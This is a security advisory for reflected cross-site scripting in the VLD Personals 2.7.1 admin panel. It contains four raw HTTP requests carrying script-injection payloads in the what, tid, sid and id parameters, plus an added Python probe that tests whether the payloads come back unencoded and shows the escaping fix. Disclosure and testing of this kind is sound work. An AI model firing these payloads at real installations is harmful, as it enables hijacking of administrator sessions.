VLDPersonals Cross-Site Scripting XSS


# Exploit Title: VLD Personals – Cross Site Scripting (Reflected), requires admin authentication
# Notified VLD Personals Date: 02/FEB/2015

# Exploit Author: Mr T
# Exploit Author's Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7.1
# Fixed Version: 2.7.2
# Tested on: Windows / Linux

XSS in "what" Parameter

Issue detail No. 1

The value of the what request parameter is copied into the application's response. The payload shown in the request below, an EMBED tag whose SRC is a base64-encoded data: URI, followed by <script>alert(1)</script> and the suffix 6a629, was submitted in the what parameter. This input was echoed unmodified in the application's response.

GET /cp/index.php?what=<EMBED%20SRC%3d"data%3aimage%2fsvg%2bxml%3bbase64%2cPHN2ZyB4bWxuczpzdmc9Imh0dH%20A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv%20MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs%20aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIG11793><script>alert(1)<%2fscript>6a629&where=all&submit=Submit&issearch=1&m=search&p=search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=search&p=manage
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0
Connection: keep-alive

Issue detail No. 2

The value of the tid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77308"><script>alert(1)</script>7ab63 was submitted in the tid parameter. This input was echoed unmodified in the application's response.

GET /cp/index.php?m=profilegroups&p=edit&tid=77308"><script>alert(1)<%2fscript>7ab63&id=11 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=profilegroups&p=manage&tid=1
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0
Connection: keep-alive

XSS in "tid" Parameter

Issue detail No. 3

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99c5"><script>alert(1)</script>d481d was submitted in the sid parameter. This input was echoed unmodified in the application's response.

GET /cp/index.php?m=membersvideos&p=edit&id=5513&sid=a99c5"><script>alert(1)<%2fscript>d481d HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=videos&p=videos
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0
Connection: keep-alive

XSS in "sid" Parameter

Issue detail No. 4

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d462a"><script>alert(1)</script>d1641 was submitted in the id parameter. This input was echoed unmodified in the application's response.

GET /cp/index.php?m=membersvideos&p=edit&id=d462a"><script>alert(1)<%2fscript>d1641&sid=287 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=videos&p=videos
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0
Connection: keep-alive

XSS in "id" Parameter
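The four issues above are the same defect at four sinks: a query parameter lands inside a double-quoted attribute and the `">` in the payload closes it. The script below is an added example, not the advisory author's or the vendor's code. It builds the four probe URLs from the requests above, classifies a response as unencoded, entity-encoded, filtered or absent by inspecting what comes back between the prefix and suffix canaries, and shows the vulnerable sink beside the hardened one. It assumes the reflected value lands in an `<input value="...">` tag (the advisory only says "an HTML tag attribute"), uses the same simple breakout canary for the what parameter as for the other three rather than the EMBED payload shown in the first request, and models the vulnerable and fixed responses locally; `model_271` and `model_fixed` are constructed stand-ins, and `fetch` can be swapped for a real HTTP request carrying an authenticated admin session cookie.

```python
"""Reflection check for the four VLD Personals 2.7.1 admin-panel parameters
reported in this advisory (what, tid, sid, id).

Added example, not the advisory author's or the vendor's code. The response
bodies produced by model_271 / model_fixed are constructed, not captured.
"""
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Attribute-breakout canary, the shape the advisory's tid/sid/id payloads use:
# <random prefix>"><script>alert(1)</script><random suffix>
BREAKOUT = '"><script>alert(1)</script>'

# The four injection points, with the other query parameters as they appear
# in the advisory's requests. Session cookies are out of scope here.
INJECTION_POINTS = {
    "what": {"where": "all", "submit": "Submit", "issearch": "1", "m": "search", "p": "search"},
    "tid": {"m": "profilegroups", "p": "edit", "id": "11"},
    "sid": {"m": "membersvideos", "p": "edit", "id": "5513"},
    "id": {"m": "membersvideos", "p": "edit", "sid": "287"},
}


def build_payload(prefix, suffix):
    """Prefix/suffix canaries let us locate the reflection inside a large page."""
    return f"{prefix}{BREAKOUT}{suffix}"


def build_url(base, param, prefix, suffix):
    """Probe URL for one injection point; urlencode percent-encodes the payload."""
    params = dict(INJECTION_POINTS[param])
    params[param] = build_payload(prefix, suffix)
    return f"{base}/cp/index.php?{urlencode(params)}"


def classify_reflection(body, prefix, suffix):
    """Look between the canaries and report how the breakout came back:
    'unencoded' - verbatim, so the attribute is closed and the script runs
    'encoded'   - HTML-entity-encoded, which is the fix we want to see
    'filtered'  - canaries present but the payload was altered some other way
    'absent'    - the canaries are not both in the response
    """
    match = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if not match:
        return "absent"
    middle = match.group(1)
    if BREAKOUT in middle:
        return "unencoded"
    if BREAKOUT in html.unescape(middle):
        return "encoded"
    return "filtered"


def render_value_attribute(name, value, escape):
    """Model of the sink the advisory describes: the parameter lands inside a
    double-quoted attribute. The <input> tag is an assumption. escape=False
    reproduces the 2.7.1 behaviour the advisory reports; escape=True is the
    standard fix (entity-encode the value, quotes included)."""
    rendered = html.escape(value, quote=True) if escape else value
    return f'<input type="text" name="{name}" value="{rendered}">'


def echo_into_attributes(url, escape):
    """Constructed page: every query parameter of the URL echoed into an attribute."""
    query = parse_qs(urlparse(url).query)
    return "\n".join(render_value_attribute(k, v[0], escape) for k, v in query.items())


def model_271(url):
    """Stand-in for the vulnerable build (unescaped echo). Replace with a real
    HTTP fetch carrying an admin session cookie to test a live installation."""
    return echo_into_attributes(url, escape=False)


def model_fixed(url):
    """Stand-in for a build that entity-encodes the value before emitting it."""
    return echo_into_attributes(url, escape=True)


def probe_all(base, fetch, prefix="a99c5", suffix="d481d"):
    """fetch(url) -> response body. Returns {parameter: classification}."""
    return {
        param: classify_reflection(fetch(build_url(base, param, prefix, suffix)), prefix, suffix)
        for param in INJECTION_POINTS
    }


if __name__ == "__main__":
    for label, fetch in (("2.7.1 model", model_271), ("fixed model", model_fixed)):
        for param, verdict in probe_all("http://localhost", fetch).items():
            print(f"{label}: {param:>4} -> {verdict}")
```

Against a live host, `classify_reflection` deliberately does not trust a plain substring search for `<script>`: it reads only the span between the two canaries, so a page that happens to contain other script tags, or that reflects the parameter twice with different encoding, does not produce a false verdict for this injection point.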